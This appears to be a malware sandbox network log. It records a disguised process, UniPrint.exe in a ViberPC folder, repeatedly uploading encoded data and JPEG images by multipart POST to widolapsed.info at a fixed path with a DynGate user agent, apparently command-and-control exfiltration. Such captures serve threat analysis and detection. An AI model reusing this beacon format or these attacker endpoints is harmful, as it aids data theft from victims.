                                                                                                      Data Ascii: E%PQEQERQ@KMBQE.hJ(hZ))i)i(ER((JZ`QEJ(hJ(h(b(h((Z)-1-%4PJ(sE%-(ZJZ`P(E%Z))hh(i(QEP))iZ3IE13IE;4SihXZ3ILpnha43NfKW
                                                                                                      2021-09-15 11:46:32 UTC2332OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 33 32 37 39 30 31 39 39 39 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3327901999--
                                                                                                      2021-09-15 11:46:33 UTC2332INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:32 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=2faa08828d158c60692f0a51d618251283995aae994b683b354664956d66a7dc; expires=Thu, 15-Sep-2022 11:46:32 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:33 UTC2332INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.34975545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:28 UTC230OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81262
                                                                                                      Content-Type: multipart/form-data; boundary=--------3571177622
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:28 UTC230OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 31 31 37 37 36 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3571177622Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:28 UTC230OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ac c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:45:28 UTC231OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:28 UTC246OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:28 UTC262OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:28 UTC278OUTData Raw: 00 7a 56 fc e9 be 74 8d d5 c9 fc 6a bd 39 6a fd 9c 56 c8 95 5a 6f 76 4b b8 9e a4 d2 e6 9a 29 69 58 b5 26 c7 53 85 37 34 b9 a4 5a 63 b3 4e 06 a3 a7 8a 4d 14 98 fa 51 4d 14 b5 26 89 8e a7 0a 60 34 ec 8a 45 26 3b 34 e1 4c cd 2e 4d 4b 45 a6 49 45 34 13 4b f5 34 9a 29 31 e2 97 22 a3 de 83 ab 0f ce 98 d7 30 27 57 06 97 2b 0e 74 ba 96 41 f9 4f d2 b8 cf 14 7f c7 ec 5f f5 c8 57 4c 75 28 17 20 64 d7 33 e2 53 9b b8 4f fd 32 1f ce aa 31 6b 70 53 52 96 87 17 45 15 b9 78 52 1f 0b e9 c6 39 74 f8 de 68 5c bc 6f 6a 1a 69 4f 9a c3 21 f6 1c 60 0f ef 0e 95 c0 dd ac 7a e9 5c c4 a5 0c ca ac 15 88 0c 30 c0 1e bd eb aa d5 20 b7 93 c5 13 5a 93 61 2d bd b9 9a 41 6d 6d 6d e5 30 d8 85 82 3b 04 5c e7 18 e0 9e f5 56 d9 5f 50 8e d2 4b 85 d3 1e 3b c3 35 ba 7d 9e d8 46 f1 ca 50 15 07 08
                                                                                                      Data Ascii: zVtj9jVZovK)iX&S74ZcNMQM&`4E&;4L.MKEIE4K4)1"0'W+tAO_WLu( d3SO21kpSRExR9th\ojiO!`z\0 Za-Ammm0;\V_PK;5}FP
                                                                                                      2021-09-15 11:45:28 UTC294OUTData Raw: f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 64 b7 77 d0 04 79 ed 2d 84 6d 22 21 29 70 c4 8d cc 17 38 28 33 d7 d6 9f 23 fe 9a 17 3a fe 93 2f d1 45 15 05 85 79 5f c5 8f f9 0c d9 7f d7 03 fc eb d5 2b ca fe 2c 7f c8 66 cb fe b8 1f e7 5a
                                                                                                      Data Ascii: n3SKOo7G#u&\ZS<O}-?)h9rjiM5?tr?_e*7I(~f>n3SKOo7G#u&\ZSdwy-m"!)p8(3#:/Ey_+,fZ
                                                                                                      2021-09-15 11:45:28 UTC310OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 31 31 37 37 36 32 32 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3571177622--
                                                                                                      2021-09-15 11:45:29 UTC310INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:28 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=43262f698fff9a2fe2aebfa507a36e50eec0556c6974b71976afaec779f20479; expires=Thu, 15-Sep-2022 11:45:28 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:29 UTC310INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.34982145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:33 UTC2332OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76640
                                                                                                      Content-Type: multipart/form-data; boundary=--------1002864139
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:33 UTC2332OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 30 32 38 36 34 31 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1002864139Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:33 UTC2332OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 98 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:33 UTC2332OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:33 UTC2348OUTData Raw: 12 dc f5 e2 c9 14 d7 8c 6b df f2 30 6a 5f f5 f5 2f fe 86 6b d9 94 d7 8c eb df f2 30 6a 5f f5 f5 2f fe 86 6b d0 cb 3e 29 1c b8 bd 91 42 96 92 96 bd 93 88 28 c5 14 50 20 c5 7a 7f c2 9e 34 9b ef fa ee 3f f4 1a f3 0a f4 ef 85 5f f2 09 be ff 00 ae e3 ff 00 41 ac ea fc 26 94 fe 23 ba a4 ac 9b 1b 58 1f 49 b6 b9 b9 9e eb 2d 02 c9 23 9b b9 40 fb a0 93 f7 aa ca 58 5a c9 1a bc 73 5d 32 b0 c8 22 f2 5c 11 ff 00 7d 56 2e 31 4f 7f c3 fe 09 a2 94 9a db f1 ff 00 80 54 d5 20 b5 bb 4b ab 4b d8 24 92 39 58 1e 22 66 fe 15 19 04 0e bc 57 90 eb fa 5f f6 46 a8 f6 a1 cb a6 37 21 65 2a 70 7d 41 ef 5e c9 2d b2 da de 58 98 64 b8 f9 e6 2a c1 ee 1d c1 1e 5b 9e 84 91 d4 0a f3 5f 89 1f f2 35 bf fd 71 4f e5 57 05 67 a7 52 66 ee b5 e8 72 74 94 ec 0a 4c 56 d6 32 12 8a 5c 51 83 40 07 7a 28
                                                                                                      Data Ascii: k0j_/k0j_/k>)B(P z4?_A&#XI-#@XZs]2"\}V.1OT KK$9X"fW_F7!e*p}A^-Xd*[_5qOWgRfrtLV2\Q@z(
                                                                                                      2021-09-15 11:46:33 UTC2364OUTData Raw: 02 8a 28 a0 42 d1 49 4b 48 02 8a 28 a0 41 4b 49 4b 48 02 96 92 94 50 21 45 2d 25 2d 21 0b 56 20 6e 82 ab 54 d6 ff 00 7a a2 5b 1a 52 76 91 af ab 1c 78 68 7b b5 71 2f d6 bb 3d 67 8f 0d 27 fb d5 c5 b9 e6 b1 c2 fc 0f d4 f5 2b fc 6b d0 ef 47 1e 1d b2 fa 0a a3 9a ba dc 78 7e c4 7f b2 3f 95 51 ae 7a 3d 7d 4d 31 0f de 5e 82 e6 8c d2 52 56 c7 3d c7 66 94 35 34 51 45 81 31 f9 34 ed c7 d6 98 29 6a 5a 2d 36 48 18 d3 83 1a 88 53 b3 52 d1 4a 4c 94 39 f5 a7 09 98 74 63 50 83 4b 52 e2 8b 53 65 a5 b9 90 7f 11 a9 56 f1 c7 5c 1a a4 0d 3b 35 0e 9c 4d 15 59 17 c5 e7 f7 94 1a 5f 3e 16 fb d1 8a a1 9a 50 c6 a5 d2 45 aa ac bd b6 d1 fa a6 29 3e c7 68 dd 0e 2a a8 63 4e 0c 6a 79 5a d9 94 a7 17 ba 25 3a 64 67 ee bd 31 b4 b6 fe 17 06 80 e7 b1 35 20 99 c7 f1 1a 2f 35 d4 39 69 be 85 76
                                                                                                      Data Ascii: (BIKH(AKIKHP!E-%-!V nTz[Rvxh{q/=g'+kGx~?Qz=}M1^RV=f54QE14)jZ-6HSRJL9tcPKRSeV\;5MY_>PE)>h*cNjyZ%:dg15 /59iv
                                                                                                      2021-09-15 11:46:33 UTC2380OUTData Raw: 44 7f de 7a 5e df b2 65 2c 33 ea d2 32 71 4f 11 b9 e0 29 3f 85 68 9d 4b 4f 8f fd 5d a9 3f 5a 43 ae 05 ff 00 55 6b 18 fa d1 ed 2a 3d a2 1e c2 9a de 45 45 b4 9d ba 46 7f 2a b7 69 a6 dc 79 a1 8a 1e b5 1b 6b b7 47 ee 84 5f a0 a6 26 ab 78 f2 2e 65 38 27 b0 a9 92 ac d1 a5 35 42 32 5b b2 e7 8c d7 6c 36 a0 fa 57 2f a7 ff 00 c8 46 df fe ba 2d 74 de 31 25 ad ad 09 ea 56 b9 9d 3f fe 42 36 ff 00 f5 d0 7f 3a 58 7f e0 1d 75 bf 8c 7a 16 a2 96 e6 60 d3 4a 14 e3 a5 52 33 69 b1 f5 72 6a b7 89 09 17 ab 83 fc 35 8b d7 bd 61 42 87 34 13 6c 9c 4e 33 92 a3 8a 89 d0 1d 4f 4f 4f b9 11 34 c3 ae 44 bf ea ed c5 61 51 5b ac 2c 3a 9c 8f 1f 57 a1 b0 da fc df c1 1a 8a 81 f5 9b b6 e8 d8 fa 56 75 15 4b 0f 4d 74 32 78 ba cf a9 6d b5 0b 97 fb d2 b7 e7 4d f3 a4 6e ae 4f e3 55 e9 cb 57 ec e2
                                                                                                      Data Ascii: Dz^e,32qO)?hKO]?ZCUk*=EEF*iykG_&x.e8'5B2[l6W/F-t1%V?B6:Xuz`JR3irj5aB4lN3OOO4DaQ[,:WVuKMt2xmMnOUW
                                                                                                      2021-09-15 11:46:33 UTC2396OUTData Raw: 28 a0 05 a2 92 8a 00 5a 5a 6d 2d 02 16 92 8a 28 01 73 45 25 14 00 b4 52 51 40 0b 45 14 50 02 d1 49 4b 4c 41 4b 49 45 30 0a 28 a2 90 05 14 51 40 05 14 51 40 05 2d 25 14 00 b4 52 52 d3 00 a2 8a 28 10 b4 52 51 40 0b 45 25 14 00 b4 52 51 40 0b 45 14 50 01 45 14 53 10 b4 94 51 40 0b 45 14 50 01 45 14 50 01 45 14 50 02 d1 48 29 69 88 29 69 28 cd 00 2d 14 99 a2 80 16 8c d2 51 40 0b 9a 29 29 68 10 51 45 14 00 52 d2 52 d3 00 a5 a4 a2 80 17 bd 14 51 40 05 14 94 b4 c0 5a 29 28 a0 42 d1 49 4b 40 0b 45 25 14 c4 2d 14 51 40 0b 49 46 68 a0 05 a2 8a 28 00 a5 a4 a2 80 16 81 49 4b 4c 42 d1 9a 4a 29 88 5c d1 9a 4a 28 01 d9 a2 9b 4b 45 c2 c2 d1 9a 4c d2 66 8b 85 87 66 8c d3 73 45 17 0b 0f cd 19 a6 d1 9a 77 15 87 66 93 34 da 5c d2 b8 ec 2e 69 73 4d a4 cd 17 0b 0e a3 34 99 a2
                                                                                                      Data Ascii: (ZZm-(sE%RQ@EPIKLAKIE0(Q@Q@-%RR(RQ@E%RQ@EPESQ@EPEPEPH)i)i(-Q@))hQERRQ@Z)(BIK@E%-Q@IFh(IKLBJ)\J(KELffsEwf4\.isM4
                                                                                                      2021-09-15 11:46:33 UTC2407OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 30 32 38 36 34 31 33 39 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1002864139--
                                                                                                      2021-09-15 11:46:34 UTC2407INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:33 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=77aa39f3e0133f49e7d84991513818e466532f67e1ab03ff26869534719b41d5; expires=Thu, 15-Sep-2022 11:46:34 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:34 UTC2407INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.34982245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:35 UTC2407OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76582
                                                                                                      Content-Type: multipart/form-data; boundary=--------795614568
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:35 UTC2408OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 39 35 36 31 34 35 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------795614568Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:35 UTC2408OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ea d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:35 UTC2408OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:35 UTC2424OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
